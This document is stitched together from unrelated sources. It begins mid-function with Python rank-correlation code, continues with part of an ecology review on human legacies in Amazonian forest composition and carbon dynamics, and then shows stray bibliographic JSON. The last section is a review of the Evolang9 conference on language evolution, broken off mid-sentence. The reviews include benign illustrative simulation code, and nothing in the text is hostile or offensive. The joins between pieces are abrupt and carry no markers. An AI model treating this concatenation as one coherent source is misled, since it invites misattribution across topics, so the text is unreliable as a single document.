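        for rank, i in enumerate(order, start=1):
            r[i] = float(rank)
        return r
    rx, ry = ranks(xs), ranks(ys)
    n = len(xs)
    d2 = sum((a - b) ** 2 for a, b in zip(rx, ry))
    return 1 - 6 * d2 / (n * (n * n - 1))

rho = spearman([d for d, _ in plots], [r for _, r in plots])
print(f"Spearman rho (distance vs domesticate richness): {rho:.2f}")
```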
Ecological legacies following disturbances may not always be persistent, as is the case with early successional taxa such as Cecropia or Trema (Fig. 1a). Mid- to late-successional taxa, such as Ficus and Pilea, have longer life spans and can persist for centuries, but eventually decrease in abundance (Akesson et al., 2020). In Costa Rican forests, the proportion of old-growth taxa can reach 30-40% within 25-30 yr following a disturbance, but only reaches 50% at 80 yr following a disturbance (Chazdon et al., 2009). These systems are expected to continue shifting in their composition for at least 200 yr following a disturbance (Foster, 1990; Loughlin et al., 2018). Such nonpersistent ecological legacies are often simply part of the long-term successional process.
Ecological legacies in Amazonia can also include the depletion of species by people (Fig. 1b). The most commonly observed example of species depletion in palaeoecological records is the palm Iriartea deltoidea, which occurs in higher abundances where there is little to no evidence of human activity compared with areas containing past fire and cultivation (Heijink et al., 2020). Iriartea deltoidea usually recovers c. 100 yr after site abandonment and often reaches abundances higher than before the disturbance (Fig. 1b). Iriartea deltoidea is currently the sixth most common tree species in Amazonia (ter Steege et al., 2020), and it is possible that this rise to dominance occurred as a result of recovery from past depletions. It is hard to find examples of persistent depletion, which would require a species to have poor recruitment and limited seed dispersal. These types of species are rare in the landscape (Wills et al., 1997), and therefore almost undetectable using palaeoecological reconstructions.
Palms are disproportionately abundant in Amazonia compared with other tree families, and show varying responses to human disturbance. Wettinia is a genus of mid-successional palms with a nonpersistent, negative response to human disturbance similar to that of I. deltoidea; Wettinia, however, does not seem to show the recovery overshoot that has been documented in Iriartea. The Euterpe species examined in these studies are useful for their fruit, but their abundances do not seem to shift drastically in response to low levels of human disturbance (Fig. 1; Heijink et al., 2020).
III. Ecological legacies on biomass and carbon dynamics
Amazonia provides a significant input to global carbon and climate models, and is believed to sequester more carbon than it releases (i.e. it is a carbon sink; e.g. Aragao et al., 2014). Global climate and carbon models assume that forests are not recovering from past disturbances, although this is intensely debated (Wright, 2013). Over recent decades, the carbon sequestration potential of Amazonia has been declining because increases in tree productivity rates have slowed and mortality rates have increased (Brienen et al., 2015). The effects of short-term disturbances (e.g. El Niño events) have been studied (Phillips et al., 2009), but very little is known about the longer-term disturbance histories within the forest plots that are used to estimate Amazonian carbon dynamics. Old-growth forests typically contain high amounts of biomass, but have relatively low productivity and mortality rates (Fig. 2a). Landscape modifications by people lower the biomass but increase the productivity and mortality of the system until the disturbance ceases (Fig. 2b). Of these modifications, fire and deforestation are the most intense, and biomass recovery patterns are known to be linked to disturbance intensity (de Avila et al., 2018). Early successional species transition to mid-successional species, which have a higher biomass, c. 60 yr after abandonment, and this process can continue for over 100 yr (Fig. 2c; Loughlin et al., 2018). Biomass recovery, however, has been shown to exceed 100% of the pre-disturbance values for at least 100 yr following an event (Fig. 2d; Poorter et al., 2016). There are no current estimates of how long it takes for the long-lived, mid-successional species to die off and for biomass to return to pre-disturbance values (Fig. 2e). There are also no data yet as to how long-term succession may be affecting the forest dynamics observed in recent decades.
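The qualitative trajectory described above (a drop at disturbance, fast recovery, a transient overshoot as long-lived mid-successional cohorts accumulate, then slow relaxation) can be sketched with a simple phenomenological curve. All parameter values below are illustrative assumptions chosen only to reproduce that shape; they are not estimates from Poorter et al. (2016) or any other cited study.

```python
import math

def agb_trajectory(t, b_pre=250.0, loss=0.8, tau_recover=25.0,
                   overshoot=0.25, tau_relax=150.0):
    """Above-ground biomass t years after a stand-clearing disturbance.

    Fast exponential recovery toward the pre-disturbance value, plus a
    transient overshoot term that decays slowly as long-lived
    mid-successional cohorts die off. Purely illustrative parameters.
    """
    recovery = 1.0 - loss * math.exp(-t / tau_recover)
    transient = (overshoot * (1.0 - math.exp(-t / tau_recover))
                 * math.exp(-t / tau_relax))
    return b_pre * (recovery + transient)

for year in (0, 30, 60, 100, 200, 400):
    print(f"t={year:>3} yr  AGB={agb_trajectory(year):6.1f} Mg/ha")
# AGB exceeds the pre-disturbance value (250) from roughly 45 yr
# onward and relaxes back only over several centuries.
```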
It is possible that the decline of the Amazonian carbon sink and the slowing of productivity observed over the last 30 yr (Brienen et al., 2015) reflect biomass and carbon dynamics returning to pre-disturbance values over the last several hundred years (Fig. 2d,e). Biomass and carbon dynamics are directly linked with species composition (e.g. Phillips et al., 2019), and thus ecological legacies on species composition (Fig. 1) probably translate into legacies on biomass and carbon dynamics (Fig. 2). High abundances of Bertholletia excelsa in southwestern Amazonia, which may be related to past human enrichment (Fig. 1a), play a large role in the overall carbon storage potential of those forests (Selaya et al., 2017). The large changes in palm abundances seen over the last several thousand years have also probably affected biomass and carbon dynamics. The forest plots used to measure carbon dynamics in Amazonia are disproportionately located in areas containing high densities of archaeological sites and high probabilities of pre-European settlement (McMichael et al., 2017b). These plots are thus probably capturing changes in carbon dynamics related to long-term successional dynamics and ecological legacies.
IV. Outlook: advancing our knowledge of long-term ecological legacies
There are several knowledge gaps and debated aspects regarding ecological legacies in Amazonian forests. The first concerns the timing and intensity of the disturbance that created the ecological legacy. Most research has focused on linking pre-European human activities with modern vegetation, but the impacts of the last 400 yr of postcolonial activities are also beginning to be considered (McMichael et al., 2017a; Arienzo et al., 2019). These two eras had different types and intensities of land use, which affect long-term successional trajectories (Bodin et al., 2020).

Fig. 2 (caption fragment): Past human disturbances include fire, forest clearance, cultivation, and tree domestication (increased palms and fruit trees); canopy openings result in a thicker understorey, increased numbers of grasses (green forest floor) and pioneer taxa. (c) Early successional forests retain high numbers of domesticated species, palms and pioneers, and begin accumulating large trees. (d) Mid-successional forests retain high abundances of domesticates, long-lived pioneers and large trees, resulting in higher biomass than mature forests (red bar, above-ground biomass (AGB)). (e) Pioneers die off and mature forests re-emerge, although they are compositionally different than before the disturbance. Darker shading indicates higher values and lighter shading indicates lower values for changes in AGB, productivity (Prod) and mortality (Mort) through time following a large-scale disturbance.
The time since the last major disturbance is almost entirely unknown in the forest plots used to study biodiversity and carbon dynamics. The time since the last fire has been published for only four of the hundreds of surveyed forest plots (Fig. 3; Heijink et al., 2020). Los Amigos in Peru has burned in some areas as recently as 50 yr ago (Figs 2, 3, yellow star), whereas Amacayacu in Colombia has not burned in over 1600 yr (Figs 2, 3, white star). The other two forest plots burned between 300 and 600 yr ago, and it is unknown whether biomass and composition have returned to pre-disturbance values (Figs 2, 3, pink and red stars). Interestingly, palm abundances in the modern vegetation and in vegetation reconstructions were significantly lower at Los Amigos, which has had more recent and frequent fire events over the last 4000 yr compared with the other plots (Heijink et al., 2020). The timing of the last major disturbance for the majority of these forest plots remains unknown (Fig. 3).
The spatial extent of these past human activities and ecological legacies into less well-studied and less accessible regions of the forest also remains unknown and is highly debated. Some have argued that the extent of site abandonment and subsequent forest regrowth after European arrival was so great that it caused a global decrease in CO2 concentrations (Koch et al., 2019). But these assumptions rely on archaeological datasets, which, like the forest plots, are biased towards the accessible areas of Amazonia (McMichael et al., 2017a). Many soil surveys conducted in randomized and less accessible areas show little to no evidence of past fire, human occupation, or even slight past forest openings (Piperno et al., 2019). Despite extensive scanning of hundreds of soil samples collected from a forest plot in the Colombian Amazon, only three charcoal fragments larger than 10 mg, the minimum size required for 14C dating, were recovered (Heijink et al., 2020). There was no evidence of maize or past forest openings in the 90 phytolith samples analysed from this forest plot, and the most recent fire occurred 1600 yr ago (Figs 2, 3; Heijink et al., 2020). The probability of the modern vegetation reflecting past human activities, or an ecological legacy, at this site is almost zero.
The integration of ecological, palaeoecological, and archaeological data is crucial to understanding the long-term ecology and ecological legacies of Amazonian forests. Archaeologists and palaeoecologists are beginning to collect complementary datasets (Mayle & Iriarte, 2014; Maezumi et al., 2018; Akesson et al., 2019). But to fully understand how past human activities affect modern processes, the palaeoecological and archaeological data must also be collected within the series of ecological surveys themselves: the Amazonian forest plots that are used for estimating biodiversity and carbon dynamics. The four plots with past fire and vegetation data tell radically different stories, and filling in the gaps on the continuum of past disturbances is necessary to make links with the patterns found in the modern observational data (Figs 1-3).
Advances in techniques for looking into the past are pushing the boundaries of what can be learned from ecological, palaeoecological and archaeological datasets. One example is extracting dendrochronological, isotopic and genetic information from living trees, and using that information as a time capsule of past human and climatic change (Caetano-Andrade et al., 2020). Another is using the chemical and morphological composition of charcoal found within palaeoecological and archaeological archives to infer the temperature (intensity) of past fires and the types of plant material that were burned (Goulart et al., 2017; Gosling et al., 2019). These technical developments, as well as those geared towards improving the taxonomic identification of macro- and microfossils, are providing deeper insights into how past disturbances are manifested in modern systems.

Fig. 3 (caption): Map showing the distribution of Amazonian forest plots that are used to observe biodiversity (blue circles) and carbon dynamics (brown circles). Stars represent forest plots where there is information on the time since the last fire (see Fig. 2).
"year": 2020,
"sha1": "3cada387a0ef83b3168c0dff0f4ccd18753544dc",
"oa_license": "CCBY",
"oa_url": "https://nph.onlinelibrary.wiley.com/doi/pdfdirect/10.1111/nph.16888",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "5d2fdf9c139c92c6e4984c3d1e48875fcf122ac6",
"s2fieldsofstudy": [
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine",
"Geography"
]
} |
Review of the 9th International Conference on the Evolution of Language (Evolang9)
The 1990s witnessed a resurrection of interest in the origins of language (in fact, such an interest had never actually faded). Although pin-pointing the exact triggers behind the initial sparks is difficult, one may point to the integration of a number of scientific advances, including the first computer simulations of the self-organized emergence and convergence of linguistic conventions (Hurford 1989, Steels 1996), the significant progress in the systematic analysis of mtDNA and Y-chromosome genetic distributions across the world (Cann et al. 1987, Underhill et al. 2000), the synthesis of data from genetics, archaeology, and linguistics (Cavalli-Sforza et al. 1988, 1992), and many others. In 1996, the first Conference on the Evolution of Language (Evolang) was held in Edinburgh for the purpose of fostering a dialog between scholars of diverse backgrounds. At the center of discussions — and in opposition to a generativist framework minimizing the value of such an attempt (Chomsky 1972, Berwick 1998) — lay an effort to account for the properties of the faculty of language in light of modern evolutionary theory (Hurford et al. 1998). The 9th Evolang conference (Evolang9), which took place in Kyoto 13-16 March 2012, was once again an opportunity for scholars from a wide range of disciplines to gather and bridge their lines of argument (McCrohon et al. 2012, Scott-Phillips et al. 2012). Since the origins and evolution of language have long been research foci in both evolutionary linguistics and biolinguistics, we provide here a review of the variety of reports brought forward during Evolang9. Without being able to do justice to the wide scope of all contributions, we mainly summarize and frame the primary arguments that echoed during the conference, highlight significant evolutions of the field in terms of both methods and content, and present our opinions on future research in this line.
approaches and fields. Without being exhaustive, contributions usually cover linguistics (sociolinguistics, language acquisition, physiology of speech, syntax, etc.), logic, game theory, mathematical modeling and computer simulations, genetics, ethology, human and comparative psychology, neuroscience, paleoanthropology, archaeology, philosophy, evolutionary psychology, and developmental biology. The relative weights of these fields, however, shift from one conference to the next. We give below five long-term tendencies we deem of special significance.
The first trend is the decrease in modeling approaches that has taken place between the mid-2000s and recent years. Models and simulations (most often self-organizing multi-agent models), for example, made up the bulk of the contributions to Evolang5 and Evolang6, respectively held in Leipzig and Rome (Cangelosi et al. 2006). The investigations then revolved around (i) the emergence of compositional structures, and most often how a stable order for subjects, verbs and objects could be achieved without central coordination (e.g., Kirby 2000, Smith et al. 2003a, Gong et al. 2005, 2009), (ii) the impact of embodiment in robots, with notable endeavors by Luc Steels' teams in Paris and Brussels to build on more sophisticated linguistic theories, such as fluid construction grammar (e.g., Steels et al. 2005, Steels & de Beule 2006, Steels 2011, van Trijp et al. 2012), (iii) the impact of socially structured populations (with popular structures such as scale-free or small-world networks) on the self-organization of linguistic systems or the diffusion of innovations (e.g., Dall'Asta et al. 2006, Barrat et al. 2007, Gong et al. 2008, Ke et al. 2008), and (iv) the impact of repeated episodes of learning on the design of linguistic structures (e.g., Kirby 2007, Kirby & Hurford 2002, Smith et al. 2003b, Steels 2012). Regarding the last effort, Simon Kirby's Language Evolution and Computation team and their Iterated Learning Model (ILM) were particularly instrumental in partly shifting models from horizontal linguistic transmission (among a usually 'immortal' population of agents) to vertical transmission (with generations of successively learning and teaching agents shaping a communication system).
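To give a concrete flavor of the self-organizing models described above, here is a minimal naming-game sketch in Python. It is a bare-bones illustration of the class of horizontal-transmission models, not a reimplementation of any cited study; the population size, number of games, and word-building scheme are all arbitrary assumptions.

```python
# Minimal naming game: agents converge on a shared word for a single
# object without any central coordination.
import random
random.seed(42)

N_AGENTS, N_GAMES = 20, 3000
inventories = [set() for _ in range(N_AGENTS)]   # words each agent knows

def new_word():
    # Invent a pronounceable-looking CVCV string.
    return "".join(random.choice("aeiou" if i % 2 else "ptkms") for i in range(4))

for _ in range(N_GAMES):
    speaker, hearer = random.sample(range(N_AGENTS), 2)
    if not inventories[speaker]:
        inventories[speaker].add(new_word())
    word = random.choice(sorted(inventories[speaker]))
    if word in inventories[hearer]:
        # Communicative success: both agents discard competing synonyms.
        inventories[speaker] = {word}
        inventories[hearer] = {word}
    else:
        # Failure: the hearer simply adopts the new word.
        inventories[hearer].add(word)

distinct = {w for inv in inventories for w in inv}
print(f"Distinct words in the population after {N_GAMES} games: {len(distinct)}")
# Typically collapses to a single shared convention.
```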
Although modeling and robotic approaches were reported during the Kyoto conference (e.g., Gong & Shuai 2012, Smith 2012, Spranger & Steels 2012), noticeably by plenary speaker Minoru Asada, who emphasized the potential of cognitive developmental robotics to study language acquisition and, more generally, to simulate child development, several attendees observed a decline with respect to their former prominence. During a preliminary satellite workshop of the conference, Bart de Boer addressed this issue by stressing three common pitfalls of modeling: (i) fact-free science, not referring to outside phenomena; (ii) cargo-cult science, an activity mimicking the procedures of science without delivering results (in Feynman's 1974 sense); and (iii) circularity, when a model only explains the data that were used to build it. To avoid these traps and keep modeling successful, de Boer advocated various strategies. Better validation of models was one of them, with mathematical proofs, sensitivity studies, and model parallelism for internal validation, and the prediction of real and non-circular data for external validation. Another direction worth taking was better complementing and re-using existing models, rather than always starting again from scratch (a tendency shared by many modelers). Finally, focusing on questions raised by non-modelers and attempting to bridge empirical gaps were deemed valuable for increasing the reliability of modeling (de Boer 2012).
A second trend is the more central position of experimental approaches in the study of language evolution. As noted by Normile (2012), this experimental stance covers a number of fields, from analyzing the online brain activity of stone tool-makers (Stout et al. 2008, Stout & Chaminade 2012) to studying how subjects learn an alien language composed of whistles (Verhoef et al. 2012). However, one of the most meaningful shifts lies, to us, in the displacement of the iterated learning model from 'silicon-made' subjects to human ones. This step was pioneered, among others, by Galantucci, in experiments where human subjects learned an artificial language in order to cooperate on a simple task (Galantucci 2005). Interestingly, several talks illustrated how the ILM, which started as a theoretical and modeling framework, has found its way to the experiment room (e.g., Scott-Phillips et al. 2010, Kirby 2012, Verhoef et al. 2012), perhaps reflecting, in a somewhat radical way, de Boer's thinking on models and simulations.
A third evolution of the field relates to the broadening of the spectrum of comparative approaches between human language and animal communication systems. For obvious reasons, apes and monkeys have been the center of interest, with many experiments consisting in teaching a human or human-like form of communication to non-human apes (e.g., Patterson 1981, Savage-Rumbaugh 2001) or focusing on their comprehension of others' intentions (e.g., Call & Tomasello 1998, 2008; Heyes 1998; Schmelz et al. 2011). Other animal models have, however, gradually made their way in and enjoyed high popularity at the Kyoto venue. Although rather distant from humans in the phylogeny of species, birds became a center of discussion (Fujita 2012, Katahira et al. 2012, Matsunaga et al. 2012, Okanoya et al. 2012, Sasahara et al. 2012, Stobbe & Fitch 2012), with special attention paid on the one side to parrots and keas for their remarkable cognitive abilities (Pepperberg 2010, 2012), and on the other side to a pair of species relevant for their close genetic relationship yet divergent environments (see below): white-rumped munias and Bengalese finches (Takahasi et al. 2012). Meanwhile, monkeys and apes were still present, and at a methodological level, keynote speaker Tetsuro Matsuzawa stressed the combination of field experiments (building specific devices in the wild to study wild populations of apes manipulating tools; Biro et al. 2003) with participant observation relying primarily on the bond between the ape mother and her child (Matsuzawa et al. 2006). All in all, the conference highlighted the strong expertise of various Japanese research centers in animal studies.
A fourth methodological trend was a latent reflection on the scientific paradigms relied on to study the evolution of language. In addition to de Boer's suggestions on successful modeling, Roberts & Winters addressed the development of nomothetic approaches in contrast with idiographic ones. While the latter deal with singular cases, the former draw on large sets of data, spanning linguistic, cultural, physical, and other domains, and seek law-like patterns behind 'surface' correlations (Roberts & Winters 2012). Nomothetic approaches have been the subject of recent publicized studies and hot debates among scholars working on the origins and current diversity of modern languages (e.g., Lupyan & Dale 2010, Atkinson 2011, Bybee 2011, Dunn et al. 2011). Since the Evolang conferences focus rather on the emergence and development of the faculty of language, contributions relying on this methodology remained limited. However, as large datasets in various fields become ever more available and manipulable, there are reasons to believe that such contributions could become influential in future venues. Nonetheless, Roberts & Winters warned against the pitfalls of this line of work, where poor quality of data (e.g., in terms of sampling), spurious correlations and a lack of alternative hypotheses may all lead to wrong conclusions (for further details, see www.replicatedtypo.com). Statistical problems linked to the non-independence of the statistical units of a study, whether due to the historical relatedness of languages or to their spatial distribution with possible geographic diffusion, prove especially difficult (Jaeger et al. 2011), as also noted by Russell Gray during his keynote lecture regarding his work on linguistic Bayesian phylogenies (Gray et al. 2009). Integrating different approaches (nomothetic, idiographic, constructive) is seen as the best way forward to compensate for the weak explanatory power of the first approach (correlation does not imply causation), the limited range of the second, and the potential circularity of the last.
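As a concrete illustration of one simple guard against such non-independence, the Python sketch below runs a restricted permutation test in which a predictor is shuffled only within (fabricated) language families, so that family-level structure is preserved under the null hypothesis. The dataset, effect size, and family grouping are all invented for demonstration; real analyses, such as the phylogenetic methods Gray discussed, are considerably more sophisticated.

```python
import random
from collections import defaultdict
random.seed(3)

# Fabricated dataset: 10 language families of 4 languages each, with a
# predictor x (e.g. a log-population proxy) and a response y (e.g. a
# complexity index) that are weakly related by construction.
langs = []
for i in range(40):
    x = random.gauss(0, 1)
    y = 0.4 * x + random.gauss(0, 1)
    langs.append((f"fam{i // 4}", x, y))

def pearson(xs, ys):
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxy = sum((a - mx) * (b - my) for a, b in zip(xs, ys))
    sx = sum((a - mx) ** 2 for a in xs) ** 0.5
    sy = sum((b - my) ** 2 for b in ys) ** 0.5
    return sxy / (sx * sy)

xs = [x for _, x, _ in langs]
ys = [y for _, _, y in langs]
observed = pearson(xs, ys)

by_family = defaultdict(list)
for i, (fam, _, _) in enumerate(langs):
    by_family[fam].append(i)

hits, n_perm = 0, 2000
for _ in range(n_perm):
    perm = xs[:]
    for idxs in by_family.values():      # shuffle x only within each family
        vals = [perm[i] for i in idxs]
        random.shuffle(vals)
        for i, v in zip(idxs, vals):
            perm[i] = v
    if abs(pearson(perm, ys)) >= abs(observed):
        hits += 1
print(f"r = {observed:.2f}, within-family permutation p = {hits / n_perm:.3f}")
```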
The final point we want to make regards brain imaging techniques applied to activities related to communication and language evolution. EEG (electroencephalography) and fMRI (functional magnetic resonance imaging) are of course ubiquitous in today's neuroscience, but original studies are gradually appearing that focus on the evolution of language. Takashi Hashimoto thus mentioned studies where simultaneous EEG recording took place in two subjects playing a coordination game (Hashimoto 2012), allowing researchers to observe the neural activity at various stages of the formation of a symbolic communication system. Russell Gray also referred to Stout and collaborators' experiments where the brain activities of tool-makers were recorded through PET (positron emission tomography) during sessions of tool-making. This allows the detection of significant changes in activated areas for different prehistoric lithic industries (e.g., Oldowan and Acheulean), and of possible overlap with language circuits (Stout et al. 2008, Stout & Chaminade 2012). Finally, whole-brain fMRI recordings in zebra finches of the neuronal correlates of song learning were presented, showing evolving activations in primary and secondary auditory areas during the course of the sensitive period (van der Kant & van der Linden 2012, Moorman et al. 2012).
Given these methodological remarks, we can now turn to the contents of the contributions reported at Evolang9, trying to frame various lines of evidence and disciplines.
Designing Language Structures: Disentangling Biology, Culture, Cognition and Learning
During Evolang9, Hajime Yamauchi usefully reframed the famous ban on publications about the origins of language by the Société Linguistique de Paris in its cultural and political context (Yamauchi et al. 2012). As in the 1860s, the evolution of the contributions to the Evolang series reflects the dominant forces and structures of the scientific domain. David Premack's famous quote, "Human language is an embarrassment for evolutionary theory" (Premack 1985: 281-282), has been used as a subtitle for some of the past Evolang conferences. Generally speaking, these meetings have attempted to provide an answer by disentangling the influences of the various frames to which language may belong, including (i) biology (with the genetic substrate of language), (ii) culture (with language existing in a socially constructed community of interacting speakers), (iii) cognition (with language building on, and coexisting in the human mind with, other cognitive abilities), and (iv) learning (with language being repeatedly learnt and transmitted between generations of speakers). Such frames are only partially separable from each other, and one may advocate for natural selection as the primary force that drove language evolution, stating that all further effects may ultimately be traced back to genes and their evolution.
Several periods of discussion during Evolang9 actually focused on the role played by natural selection in the emergence of language, with clear evidence that, more than twenty years after Pinker & Bloom's (1990) seminal paper on the question, some scholars still oppose its primacy. Keynote speaker Massimo Piattelli-Palmarini particularly challenged the standard evolutionary perspective, defending instead an evo-devo (evolutionary developmental biology) perspective in which minor gene rearrangements and shifts in gene regulation lead to major morphological changes, hence understating the driving role of function in such changes as long as survival and reproduction are preserved. Piattelli-Palmarini cited the rhopalial eyes of the cubozoan jellyfish (Gerhart & Kirschner 1997, Coates 2003) as a specific analogy: a complex structure without function, although discussants raised the question of how it could have spread to the entire population without a functional advantage (see also Mackie 1999 for further arguments about the functionality of the cubozoan ocelli or 'eyes').
Irrespective of the actual weight of standard selection, several contributions reminded the audience of the complexity of the phenomena at hand. Yasuhiro Suzuki and colleagues introduced the intricacies of the evolution of herbivore-induced plant volatiles, and how the interwoven evolution of species leads to complex dynamics with possible increases or decreases in biodiversity (Shiojiri et al. 2010, Suzuki et al. 2012). Keynote speaker Simon Fisher furthermore detailed the complexity behind the role of the FOXP2 gene, arguing against the reductionist view of a 'gene for oral language' and stressing the complex set of genetic interactions in which FOXP2 fulfills its functions (Fisher & Scharff 2009, Fisher 2012). Fisher also highlighted some recent advances in neurogenetics, and how this discipline might help in the future to decipher the convoluted relationship between the cognitive function of language and its genetic basis.
The subtlety of natural selection beyond the key ideas of genetic variability and selection was particularly addressed during Evolang9 through the notions of masking and unmasking of selective pressures in relation to the process of niche construction. Interestingly, these phenomena were referred to by scientists from various fields, covering modeling and animal studies.
During his concluding lecture, Terrence Deacon gave a clear example outside the linguistic sphere: while many animals synthesize ascorbic acid (vitamin C), anthropoid primates lack this capacity and possess only a non-functional version of the crucial gene involved in the chemical mechanism. According to Deacon, the primates' fruit diet, rich in vitamin C, explains this evolution: because this vitamin was readily available 'exogenously' for these animals, the selective pressure on the gene involved in endogenous synthesis relaxed (it was masked) until the gene lost its function. This in turn bound primates to their diet, playing a role in the construction of their specific ecological niche. Functions related to living in this niche, especially being efficient at acquiring food rich in vitamin C, hence came under stronger selective pressure. In other words, the selective pressure on such functions was unmasked in the process (Deacon 2003, Wiles et al. 2005). Deacon insisted that the whole process was cyclical, with adaptations for niche maintenance leading to novel functional synergies. He also applied this evolutionary pattern to language, stating that the construction of a symbolic linguistic niche resulted in unmasking specific selective pressures on the human brain while at the same time masking previous ones, hence allowing brain structures to evolve in functionality (Deacon 2012).
Other speakers presented test cases for this framework. The evolution of Bengalese finches (BFs) in Japan with respect to white-rumped munias (WRMs) was especially enlightening. WRMs are wild birds found in tropical Asia and in some parts of Japan; a strain was isolated 250 years ago and domesticated, resulting in today's BFs. Studies devoted to the features of the vocal cultures of both strains, with two colonies recorded over several generations in sound-proof boxes, showed that WRMs kept the colony founders' song across generations while BFs displayed rapid divergence (Takahasi & Okanoya 2010, Takahasi et al. 2012). These observations could be explained by a stronger innate bias in WRMs toward specific songs, which in turn relates to the previous notions of masking and relaxed selective pressure: WRMs in the wild are under strong selective pressure to produce songs that will attract conspecifics, while this pressure was relaxed/masked in the domesticated strain. In such studies, evaluating the similarities between birdsongs, or their overall complexity and diversity, can be done with simple or more refined techniques. Katahira et al. (2012) relied on hidden Markov models to study the high-order context dependencies in Bengalese finch songs, showing that a first-order model was enough to predict the songs. We can also report here on Sasahara et al.'s (2012) approach, which consisted in applying network construction and analysis techniques to the transitions observed between different phrases along song sequences of the California Thrasher. It appeared that the structural properties of the bird's 'syntax' allowed both familiarity at the local level of the song sequences and novelty at the global level; both aspects were judged useful by the authors, the first for establishing a singer's identity and the second for letting birds develop virtuosity in their singing.
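The model-comparison logic behind such song analyses can be sketched briefly. The Python toy below fits a zeroth-order (bag-of-phrases) and a first-order Markov model to a fabricated phrase sequence and compares held-out log-likelihoods; the sequence, the add-one smoothing, and the single train/test split are all illustrative simplifications of what the cited studies did with real recordings and hidden Markov models.

```python
import math
from collections import Counter, defaultdict

# Fabricated phrase sequence with a strong first-order structure.
song = list("abcabcabdabcabdabcabcabd") * 4
train, test = song[:72], song[72:]

def unigram_logp(train, test, alpha=1.0):
    # Zeroth-order model: phrase frequencies only, add-one smoothed.
    counts = Counter(train)
    vocab = set(train) | set(test)
    total = len(train) + alpha * len(vocab)
    return sum(math.log((counts[s] + alpha) / total) for s in test)

def bigram_logp(train, test, alpha=1.0):
    # First-order model: transition frequencies, add-one smoothed.
    # (Scores one fewer symbol than the unigram model; fine for a toy.)
    trans = defaultdict(Counter)
    for prev, cur in zip(train, train[1:]):
        trans[prev][cur] += 1
    vocab = set(train) | set(test)
    logp = 0.0
    for prev, cur in zip(test, test[1:]):
        row = trans[prev]
        logp += math.log((row[cur] + alpha) / (sum(row.values()) + alpha * len(vocab)))
    return logp

print(f"zeroth-order held-out log-likelihood: {unigram_logp(train, test):.1f}")
print(f"first-order  held-out log-likelihood: {bigram_logp(train, test):.1f}")
# The first-order model scores far better, i.e. context matters here.
```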
Another test case came from the modeling efforts attempting to assess the respective weights of biology, culture, and learning in the emergence of linguistic structures. A Bayesian iterated learning model of cultural transmission, coupled with a mechanism of biological evolution, showed that weak genetic biases could be quickly unmasked and stabilized by cultural transmission in a population of speakers, yet never turn into strong biases because of masking by iterated learning (Kirby et al. 2007, Thompson et al. 2012). These simulations stand against the postulate that linguistic universals are due to strong innate biases, a 'universal grammar' (UG) (Chomsky 1965). Instead, they suggest that such universals can be explained by weak biases and a coordination of biology and culture regardless of their different evolutionary rates.
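A stripped-down version of the Bayesian iterated learning setting can illustrate how a weak bias surfaces in behavior without becoming a strong one. In the sketch below, each learner samples a variant from its posterior after observing one noisy utterance from its teacher; across many chains, the distribution of variants converges to the learners' weak prior (a Griffiths & Kalish-style result, swapped in here for illustration). The prior, noise level, and chain lengths are arbitrary assumptions, and the cited models are far richer.

```python
import math, random
from collections import Counter
random.seed(0)

PRIOR = {"A": 0.55, "B": 0.45}   # weak innate bias toward variant A
NOISE = 0.3                       # chance of producing the other variant
M = 1                             # utterances each learner observes

def likelihood(data, variant):
    return math.prod((1 - NOISE) if d == variant else NOISE for d in data)

def produce(variant, m=M):
    other = "B" if variant == "A" else "A"
    return [variant if random.random() > NOISE else other for _ in range(m)]

def learn(data):
    # Bayesian "sampler" learner: draw a variant from the posterior.
    post_a = PRIOR["A"] * likelihood(data, "A")
    post_b = PRIOR["B"] * likelihood(data, "B")
    return "A" if random.random() < post_a / (post_a + post_b) else "B"

final = Counter()
for chain in range(2000):
    variant = "B"                 # start every chain on the dispreferred variant
    for _ in range(20):           # 20 generations of teacher -> learner
        variant = learn(produce(variant))
    final[variant] += 1
print(final)  # roughly 55% "A": the stationary distribution mirrors the prior
```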
Another key concept repeatedly addressed during Evolang9 was the double articulation of language, with meaningful units (morphemes) built from meaningless units (phonemes) and then articulated into larger structures (sentences and discourses). In his keynote talk, Simon Kirby termed the first articulation of this duality of patterning 'combinatoriality', and the second 'compositionality'.
The emergence of compositionality was investigated by Kirby and colleagues in a lab experiment involving the learning of an artificial language consisting of strings of syllables paired with structured graphic meanings. Subjects were tested on their learning, with their answers then used to teach naive learners, much in the fashion of iterated learning in computer models (e.g., Kirby et al. 2008). Different conditions led to different results. Isolated subjects learning a system and transmitting it to the next generation (i.e. vertical transmission but no horizontal transmission), with an additional, external mechanism to avoid ambiguity, led to the emergence of a compositional communication system. While not preventing ambiguity restricted the development of compositionality, replacing ambiguity avoidance with horizontal transmission (having two subjects in each generation communicating with one another about the various meanings) restored the previous result. Finally, when vertical transmission was removed and only horizontal transmission took place, compositionality remained limited. These various results showed that a combination of both naive learners and communication was needed to achieve compositionality. In addition, a fourth study, where structures were learned and exchanged without corresponding meanings, further showed that semantics was not needed for the emergence of repeated subsequences in the strings of syllables.
In order to address the emergence of combinatoriality, it was necessary to get away from existing languages. Tessa Verhoef and colleagues addressed this issue by having subjects produce sounds on slide whistles, the properties of which could be analyzed in terms of combinations, repetitions, and so on. Their results suggested that phonemic coding need not rely on pressure from a large number of signals, an argument behind the hypothesis that an initially holistic proto-language could have evolved as the number of exchanged meanings increased over time. Rather, starting from random sequences of whistles, iterated learning gradually led to whistled elements being reused according to combinatorial constraints (Verhoef et al. 2011, 2012).
Combinatoriality, as described by Kirby, was also addressed in a contribution regarding the alarm calls of Campbell's monkeys (Barceló-Coblijn & Gomila 2012). In contrast with the well-known holistic alarm calls of vervet monkeys (Seyfarth et al. 1980), the six calls of Campbell's monkeys display an internal structure, with the addition of a final -oo resulting in a different meaning ('krak' relates to leopards, while 'krakoo' can be used for almost any disturbance) (Ouattara et al. 2009). What looks a priori like affixation here points to the morphology found in human language. However, Barceló-Coblijn & Gomila insisted that the components of the alarm calls do not share all the features of human morphemes. On the one hand, the final -oo does not possess a meaning of its own, and the call resulting from the concatenation of, say, 'krak' and 'oo' does not have a meaning transparently related to the meanings of its parts. On the other hand, the authors stressed that morphemes are more than minimal units of meaning, standing at the crossing of two processes. The first process is lexicalization, by which concepts are turned into lexical units respecting the 'edge features' of morphemes. These features describe the semantic and syntactic compositional properties of morphemes, and lead to a hierarchical structure of lower and higher meaningful units. The second process is externalization, by which lexical units get a phonological structure. Campbell's monkeys' alarm calls were then defined as pleremes (meaningful signals made of meaningless particles), relating only to the second process of encoding and compressing information into an external 